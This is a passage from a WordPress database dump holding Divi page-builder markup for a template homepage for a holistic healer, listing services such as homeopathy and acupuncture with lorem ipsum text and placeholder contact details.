background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-21.png\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\"]<h1>My Services</h1>\n<p>Nulla quis lorem ut libero malesuada feugiat curabitur non nulla sit convallis quis ac lectus amet nisl tempus.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.4.7\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Homeopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-10.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Hypnopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-2.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Eastern Medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-3.png\" image_last_edited=\"off|tablet\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Naturopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Relaxation Massage\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Meditatoin\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Acupuncture\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.4.8\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\"]<h2>Classes & Workshops</h2>\n<p>Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Vivamus magna justo, lacinia eget consectetur sed.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover_enabled=\"on|hover\" icon_color__hover=\"#000000\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Vestibulum ante\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla quis\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Curabitur nulla\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Quisque velit\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Proin eget\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_text=\"View Calendar\" button_alignment=\"center\" _builder_version=\"4.4.8\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.4.8\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\"]<h2>Don\'t wait to make the shift to a more holistic approach</h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\"]<p>Cras ultricies ligula sed magna dictum porta. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec rutrum congue leo eget malesuada. Nulla porttitor accumsan tincidunt. Curabitur aliquet quam id dui posuere blandit. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia.</p>\n<p>Donec rutrum congue leo eget malesuada. Vivamus suscipit tortor eget felis porttitor volutpat. Pellentesque in ipsum id orci porta dapibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Curabitur aliquet quam id dui posuere blandit. Quisque velit nisi, pretium ut lacinia in elementum.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.4.8\" background_color=\"#f6ddd7\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-24.png\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-46.png\" title_text=\"holistic-healer-46\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.4.8\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-21.png\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\"]<h2>My Practice</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3>Location</h3>\n<p>1234 Divi St. #1000<br /> San Francisco, CA 94220</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3>Make an Appointment</h3>\n<p>Nulla quis lorem ut libero malesuada feugiat</p>[/et_pb_text][et_pb_button button_text=\"Book Now\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3>Open Hours</h3>\n<p>Monday - Friday: 10am - 6pm<br /> Saturday: 3pm - 6pm</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-01 10:44:53','2021-05-01 02:44:53','',28,'https://verde.desidrivers.com.au/?p=79',0,'revision','',0),(66,1,'2021-05-01 09:47:49','2021-05-01 01:47:49','[et_pb_section admin_label=\"section\"]\n [et_pb_row admin_label=\"row\"]\n [et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<!-- wp:pagelayer/pl_post_props {\"post_title\":\"Home\",\"post_name\":\"home\",\"featured_image\":\"\",\"ele_bg_hover_delay\":\"400\",\"ele_css\":\"html{\\nscroll-behavior: smooth;\\n}\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"pagelayer-id\":\"q6w1628\"} /-->\n<!-- wp:pagelayer/pl_row 